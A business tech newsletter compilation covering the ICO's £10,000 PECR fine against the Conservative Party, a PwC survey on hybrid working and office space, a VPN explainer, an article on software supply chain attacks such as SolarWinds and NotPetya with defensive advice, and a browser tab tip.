Tech News : Conservative Party Gets £10,000 Data Protection Fine

The ICO has fined the Conservative Party £10,000 for sending unlawful marketing emails to people who did not want to receive them.

Breach

The ICO has decided that after an investigation into emails sent from the Conservative Party, in the name of Rt Hon Boris Johnson MP, during the eight days in July 2019 after he was elected Prime Minister, the Conservative Party breached the Privacy and Electronic Communications Regulations (PECR) of 2003.

Unsolicited Emails

The breach of PECR occurred because, as the ICO concluded, the Conservative Party did not have the necessary valid consent in cases where marketing emails were received by complainants. Although 51 emails were found to be conclusively in breach of the regulations, the Conservative Party sent out 1,190,280 marketing emails between 24 July and 31 July 2019, and the ICO accepts it is likely that some of those emails would have been validly sent, but that it is not possible to identify what that proportion is. This is because, as stated by the ICO, “the Conservative Party failed to retain clear records of the basis upon which people had consented to receive marketing emails, as required by law.”

More Marketing Emails Sent During The Investigation

The ICO expressed concern that while the investigation into the initial breach was underway before the Conservative Party had addressed the original compliance issues, it “engaged in an industrial-scale marketing email exercise during the December 2019 General Election campaign, sending nearly 23 million emails” which “generated a further 95 complaints”.

Stephen Eckersley, ICO Director of Investigations, said “It’s really concerning that such large-scale processing occurred during the ICO’s ongoing investigation and before the Conservative Party had taken all the steps necessary to ensure that its processing, and database of people who would receive emails, was fully compliant with the data protection and electronic marketing regulations”.

The Fine

There has been criticism from some online commentators that the £10,000 fine may not be enough, when considering that according to newspaper reports, one luxury hamper of organic food delivered to 10 Downing Street recently cost £27,000.

What Does This Mean For Your Business?

It is disappointing and concerning that such a big political party (the party now in government) would not check or know about and/or failed to comply with well-publicised data protection laws. As those at the heart of UK law-making, this does not reflect well.

For businesses, this story is a reminder that there are clear laws pertaining to direct marketing (i.e. any communication of advertising or marketing material directed at particular individuals). It is a reminder that consent is vital, and it is important to keep clear records of the basis upon which people consent.  Ignoring the regulations can result in a hefty fine and could prove very damaging to the reputation of a business.

Tech News : Hybrid Working Could See Half of UK Businesses Cut Office Space

A recent PricewaterhouseCoopers (PwC) survey has found that half of UK businesses expect to reduce the size of their office space, and one-third expect to reduce it by 30 percent.

Reduce Size of Real Estate Portfolio

The Occupier Survey of 258 of the UK’s largest companies found that half of the organisations surveyed expect to reduce the size of their real estate portfolio and one third believe they will reduce their office footprint by more than 30 percent, while only 10 percent agree that the level of employees working from the office will return to pre-pandemic levels.

Reduction of Nine Million Square Feet

The survey found that major UK employers could reduce their office portfolio by up to nine million square feet, which is equivalent to 14 Walkie Talkie buildings (the 37-floor high rise on London’s Fenchurch Street).

Hybrid Working

The survey concludes that the shift to hybrid working, whereby employees work part of their time at home and part in the office, is now a pattern that is (after the pandemic) embedded in the working culture of many organisations and is the driver for the need to reduce office space. 

Increased Productivity?

Results from the Occupier Survey across all sectors showed that just over half of all respondents said that virtual working has had a positive impact on productivity in their organisation.

PwC Post-Pandemic

PwC, who conducted the survey, is one of the ‘big four’ accountancy firms and recently went public with its post-pandemic working arrangements for its employees.  PwC’s accountants and consultants in the UK will now be able to spend an average of just two to three days a week in the office.  This means that staff will typically be spending 40 to 60 percent of their time at its 20 UK offices or at client sites, while the rest of their working week can be spent working remotely. Also, PwC’s staff will now have greater flexibility to decide their working hours, can log on at times that suit them, and many employees will be given a half-day on Fridays in July and August (just for 2021 as an experiment).

Other businesses that have announced a change from the traditional 9 to 5 office working practices include the Nationwide building society (where many staff have the choice of office or remote working) and oil company BP whose staff can spend two days a week working from home.

Not Everyone Agrees

Not everyone is in favour of a post-pandemic hybrid, blended approach to work.  For example, in February, the CEO of Goldman Sachs, David Soloman, publicly rejected the idea of flexible/hybrid working as an “aberration” because it doesn’t fit with an ‘apprenticeship culture’.

Also, Chancellor Rishi Sunak recently highlighted the benefits of workers actually spending physical time together in the office.

Impact on City Centres and Surrounding Businesses

Reducing office space in city-centres, however, could have a negative impact on many of the surrounding (and dependent) businesses such as sandwich shops, other retailers, cleaners, transport workers, bars, restaurants, and gyms.

What Does This Mean For Your Business?

This story is really about what post-pandemic working will look like for many big businesses with costly, often city-centre and/or prime location office spaces that have traditionally relied upon everyone coming to work at the office.  The pandemic forced many businesses to look again at their model for the working week and their costs and the signs are that there will be a clear move to hybrid working and a blended approach. This means a reduction of office portfolios for many big business and perhaps other ideas for office space such as flexible space, ‘subleasing’ models and partnerships for shared office space.

Tech Insight – What Is A VPN?

In this article, we take a brief look at what a VPN is, how it works, its advantages, plus its disadvantages.

What Is A VPN?

A Virtual Private Network (VPN) is a service that allows you to create a secure connection to another network over the Internet, thereby creating a secure, protected, encrypted ‘tunnel’. A VPN is a private, secure, way to send and receive data across shared or public networks as if your computing devices are directly connected to the private network.

How Does a VPN Work?

A VPN works by routing your device’s internet connection through your VPN provider’s private server rather than your internet service provider (ISP). This creates an encrypted virtual tunnel. Also, the fact that your traffic is exiting the VPN provider’s server means that your true IP address is hidden, thereby hiding your identity and location.

Why Use A VPN?

There are many reasons why people use VPNs including:

– A general wish to keep data secure, keep online activity private, and feel safer.

– Protection from the risks of using public Wi-Fi networks (e.g. while out and about).

– Maintaining security when working remotely/from home (as many have done during the pandemic).

– As a good way to protect all devices in one go (for example, most paid-for VPNs provide multiple simultaneous connections).

– To escape bandwidth throttling.

– For those living in countries where there are repressive regimes, VPNs can help users stay in touch with the outside without being detected. However, VPNs and proxies have been banned in Russia for several years now, and China has regulated Virtual Private Networks (VPNs) through the country’s Ministry of Industry and Information Technology, and required developers to seek a license from the government before creating VPNs. 

Choosing a VPN

Things to consider when choosing a VPN service include:

– A service with no logging (no keeping of logs) can provide greater privacy.

– Find out where the VPN operator is geographically based.  For example, a VPN company in some countries may be subject to control and interference (enabling logging and adding tracking) by the state.  Many VPN services, for example are based in China.

– Google the VPN service to see if there has been any history of incidents and problems with the service.

– Read reviews about different VPN services (however, you should appreciate that that some may be unreliable, paid-for reviews).

– Make sure that the VPN service you choose has enough ‘exit nodes’ in the location you want to connect from in order to get better speed and service.

– Check whether the service disallows certain protocols e.g., P2P traffic, thereby potentially negatively affecting the service levels at certain times.

Advantages

Some advantages of VPNs include:

– Getting around geo-locking of content.  For example, a VPN can make a user look like they are in a region where content is available, thereby giving the user access to their favourite content wherever they are.

– VPNs provide safety, security, and anonymity e.g., they hide details such as location.

– VPNs are a good way to provide a secure connection for remote workers.

– Convenience. Having a VPN that can easily switched on (e.g., while using a device in public place such as a café) offers a very convenient mobile security and privacy solution.

– If shopping online, using a VPN can help save money by getting around different prices for services based on region.

– VPNs can represent a very cost-effective security measure when compared to the costs of some security software (licensing fees) and firewalls. 

Disadvantages

Some of the disadvantages of VPNs include:

– Since a VPN is a virtual connection inside a physical network, slow connection speeds can sometimes be the result. VPN service providers are, however working on ways to minimise this problem.

– VPN blockers can be used by companies looking to charge users based on their geographic location.

– Setting up some VPNs can be complicated, and poor configuration from poor setup could lead to information leaks.

– Dropped connections can be a problem with VPNs. This can mean that a user’s true network information is displayed and can also lead to problems with a user’s ISP if sites have been visited that violate the ISP’s terms of service.

– VPNs may make it more challenging for activities that require bandwidth (e.g. gaming), however this can be easily enabled and disabled.

Popular VPNs

Popular VPN services promoted in the UK include ExpressVPN, NordVPN, Surfshark, IPVanish, CyberGhost, Hotspot Shield, ProtonVPN, and Private Internet Access.

What Does This Mean For Your Business?

A VPN is a convenient and effective security and privacy tool that has become particularly relevant for remote workers over the last year. Choosing a trusted, paid-for VPN solution with a good reputation is advisable for maximum peace of mind and VPNs offer benefits beyond just security (e.g. getting around geo-locking of content). It should always be remembered, however, that a VPN is one of many different tools and tactics that businesses can use as part of a much broader business and cyber security strategy.

Featured Article : How Secure Is Your Software/Digital Supply Chain?

It is easy to think that cyber-attacks are likely to come from outsiders unconnected to the business, but how much do you know about the security of your digital supply chain?

Software Supply Chain Risks

Businesses use many different third-party software tools as part of their day-to-day transactions and for organisations in the public sector, for example, the software, systems, and networks used may be closely tied to main suppliers with bespoke software solutions. Software supply chains are part of the wider information and communications technology (ICT) supply chain framework of an organisation which, in itself, is a network of retailers, distributors, and suppliers, all of whom are links in a chain of sale, delivery and production of software and managed services (and hardware), all of which are at risk.  As highlighted in a recent NIST (US) white paper, software is at risk of malicious or inadvertent introduction of vulnerabilities at each of the design, development and production, distribution, acquisition and deployment, maintenance, and disposal phases of the ICT Supply Chain Lifecycle.  Privileged access (such as accepting third-party software defaults without investigating further), allowing additional accessibility vectors, and third-party software that requires frequent communication with the vendor to update it can represent real threats to business/organisational security.

As defences have improved against the more common areas that are known to be susceptible to cyber-attacks (and therefore have become well-defended by organisations), cyber-criminals have turned their attention to more vulnerable areas with easier access – the software supply chain.  This is a difficult area for businesses to monitor and defend against as much of it appears to be based mostly on the trust of vendors and the more third-party software a business uses (from different sources) and the more links in the chain there are, the more risks there are.

How?

An example of how a supply chain could exploited is that of hackers writing malicious code or introducing a malicious component into a company’s trusted software (or hardware), which in turn can enable them to hijack a whole system and turn any updates that the company sends out into trojan horses (malware).  This, in turn, can allow the criminals to have complete control over a supplier’s customer networks, which could ultimately affect thousands of victims.

Survey

Some of the challenges that companies face in tackling the issue are highlighted in a BlueVoyant survey from 2020 which showed that 80 percent of Chief Information Officers and Information Security Officers (CIOs and CISOs) said they had experienced a breach originating with a third-party vendor in the past year.  Also, the survey revealed that four out of five organisations had experienced a cyber-security breach precipitated by a third-party vendor, almost one-third of security professionals (29%) said they had no way of knowing if a cyber risk emerged in a third-party vendor, fewer than a quarter (22.5%) said they actively monitor their entire supply chain, and almost one third (32%) said they only typically reassess and report a vendor’s cybersecurity risk position twice a year or less frequently.

Examples

High profile examples of supply chain attacks include:

– SolarWinds. In 2020, US-based IT management company SolarWinds Corp was infiltrated by a foreign threat actor who compromised the company’s build servers and used its update process to infiltrate customer networks. The attacker added malicious code into the company’s software system. This led to SolarWinds unwittingly sending out software updates to its customers that included hacked code. This was one of the biggest and most sophisticated hacks ever, thought to have compromised up to 18,000 SolarWinds customers that used the company’s Orion network monitoring software.

– In 2017, there were suspicions that in the US, Kaspersky antivirus was being used by a foreign intelligence service for spying.  This led to U.S. government customers having to remove Kaspersky’s products from networks and them being disallowed from acquiring future products from that vendor.

– Also in 2017, the NotPetya (ransomware) attack saw a malicious data encryption tool inserted into a legitimate piece of software that was used by most of Ukraine’s financial and government institutions. This resulted in the malware spreading via trusted networks, rather than over the internet, thereby bypassing the processes put in place to prevent ransomware attacks.

Reducing The Risk of Software Supply Chain Attacks

Although the situation is a challenging one for many businesses and organisations, there are measures that can be taken to reduce the risk of attacks, breaches and other security and network issues caused via the software supply chain.  These include:

– Implementing a formal risk management program to assess all third-party suppliers against a set of criteria relating to whether third parties really need to access an organisation’s data or systems, and how business-critical they are to organisational processes. This can help CISOs and CIOs to identify and prioritise suppliers who pose the highest risk and need the most scrutiny and controls.

– Putting a patching policy and regime in place that ensures software updates are implemented as soon as possible to prevent criminals from exploiting old loopholes.  This could also involve testing (in a controlled environment) any updates related to security before rolling them out across the company network.

– Adopting a zero-trust approach and architecture means that rather than simply granting unrestricted access based on trust, verification is always required, thereby stopping the fast escalation of problems caused by a supply chain attack.

– Using more holistic, forward-thinking, and data-driven strategies can help businesses/organisations to be better informed about security readiness of any vendor partners.

– Sticking to proven security strategies such as investing in security programs, conducting regular risk assessments, and prioritising issues highlighted by the assessments, devising a plan, hiring the right staff, and using trusted, evidence-based tools can all help to mitigate the risks.

What Does This Mean For Your Business?

Previous, high-profile attacks such as SolarWinds have highlighted the interconnected vulnerabilities of business software/digital supply chains. Businesses face the challenges of being able to first get an overall view of where the potential risks/threats could come from (an audit and regular risk assessments) and of implementing an approach (e.g. zero tolerance), tools and procedures that mitigate those risks in a cost-effective and operationally friendly way. Interference by criminals that can lead to successful supply chain attacks has been shown to occur at any point from the development of software, through distribution, right through to disposal. This means that all businesses and organisations, private and public sector need to take a close interest in the security profile of their suppliers as well as their own organisations.

Tech Tip – Re-Open A Recently Closed Tab

Sometimes you can accidentally close an important browser tab. Here’s a fast and easy way to re-open that tab:

– In Google Chrome or Microsoft Edge, right click on the title bar of the browser (the part above the address field).

– Select ‘Reopen closed tab’.

– Alternatively, press Ctrl + Shift + T.